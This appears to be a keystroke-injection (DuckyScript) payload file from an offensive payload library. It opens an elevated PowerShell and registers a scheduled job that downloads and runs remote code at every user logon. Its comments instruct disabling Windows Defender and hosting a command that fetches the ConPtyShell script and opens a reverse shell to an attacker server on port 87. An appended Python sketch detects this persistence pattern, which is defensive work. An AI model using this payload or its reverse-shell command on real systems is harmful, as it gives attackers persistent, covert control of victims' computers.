Path: blob/master/payloads/library/remote_access/Netcat-Reverseshell-On-Log-In/payload.txt
REM Title: Netcat Reverseshell On Log In
REM Description: Creates a PowerShell Job/Task to remotely connect to the computer with netcat every time the user logs in
REM Author: https://github.com/HokkaidoInu
REM delay: You may want to change the delays and/or delete some, I have it like it is because I have a really slow computer
REM setup:
REM Windows Defender is required to be disabled
REM Have IP and port 87 open and listening on server side for netcat reverse shell
REM Create a txt file with the command below in it, replacing the IP with your server's IP:
REM IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 123.456.7.890 87
REM Host the text file online on GitHub or your own web server or something
REM Then in the payload, replace https://example.com/txt/load.txt with the URL where you are hosting your txt file in raw format
GUI r
DELAY 4000
STRING powershell
CTRL SHIFT ENTER
DELAY 4000
LEFT
DELAY 4000
ENTER
DELAY 4000
STRING $T = New-JobTrigger -AtLogOn ; $Script = Invoke-WebRequest 'https://example.com/txt/load.txt' ; $ScriptBlock = [Scriptblock]::Create($Script.Content) ; Register-ScheduledJob -Name "Powershell" -ScriptBlock $ScriptBlock -Trigger $T
DELAY 4000
ENTER
DELAY 8000
STRING exit
DELAY 4000
ENTER
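
Detection sketch for the persistence step in the payload above (an added example, not part of the original payload or its repository): it scans PowerShell command text, such as script block logging output (event ID 4104), for a `Register-ScheduledJob` call whose script block is built from downloaded content and whose trigger fires at logon or startup. The function and variable names, the pattern list and the `BENIGN` sample are assumptions made for this example; statements are split naively on `;` and newlines.

```python
import re

# Patterns chosen for this example; not an exhaustive list of download primitives.
DOWNLOAD = re.compile(r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadString)\b", re.I)
BOOT_TRIGGER = re.compile(r"\bNew-JobTrigger\b.*-(AtLogOn|AtStartup)\b", re.I)
SB_CREATE = re.compile(r"\[scriptblock\]::Create\(\s*\$(\w+)", re.I)
ASSIGN = re.compile(r"^\s*\$(\w+)\s*=\s*(.+)$", re.S)

def param_var(name, stmt):
    """Lower-cased variable name passed to -<name>, or None."""
    m = re.search(r"-%s\s+\$(\w+)" % name, stmt, re.I)
    return m.group(1).lower() if m else None

def analyze(script_text):
    """Return one finding per Register-ScheduledJob call in script_text."""
    remote, triggers, blocks, findings = set(), set(), set(), []
    for stmt in re.split(r"[;\r\n]+", script_text):
        m = ASSIGN.match(stmt)
        if m:
            var, rhs = m.group(1).lower(), m.group(2)
            if DOWNLOAD.search(rhs):
                remote.add(var)        # variable holds downloaded content
            if BOOT_TRIGGER.search(rhs):
                triggers.add(var)      # variable holds a logon/startup trigger
            sb = SB_CREATE.search(rhs)
            if sb and sb.group(1).lower() in remote:
                blocks.add(var)        # script block built from downloaded text
        if re.search(r"\bRegister-ScheduledJob\b", stmt, re.I):
            name = re.search(r"-Name\s+[\"']?([\w.-]+)", stmt, re.I)
            findings.append({
                "job": name.group(1) if name else None,
                "remote_scriptblock": param_var("ScriptBlock", stmt) in blocks,
                "logon_trigger": param_var("Trigger", stmt) in triggers,
            })
    return findings

# The registration command from the payload above, as it would appear in logged script text.
PAGE_COMMAND = r'''$T = New-JobTrigger -AtLogOn ; $Script = Invoke-WebRequest 'https://example.com/txt/load.txt' ; $ScriptBlock = [Scriptblock]::Create($Script.Content) ; Register-ScheduledJob -Name "Powershell" -ScriptBlock $ScriptBlock -Trigger $T'''
# Constructed benign job for contrast: literal script block, daily trigger.
BENIGN = r'''$D = New-JobTrigger -Daily -At "03:00"
Register-ScheduledJob -Name "Cleanup" -ScriptBlock { Get-ChildItem $env:TEMP } -Trigger $D'''

if __name__ == "__main__":
    for sample in (PAGE_COMMAND, BENIGN):
        print(analyze(sample))
```

A finding with both `remote_scriptblock` and `logon_trigger` set to true marks a job that re-runs fetched code at every logon, which is the pattern worth alerting on.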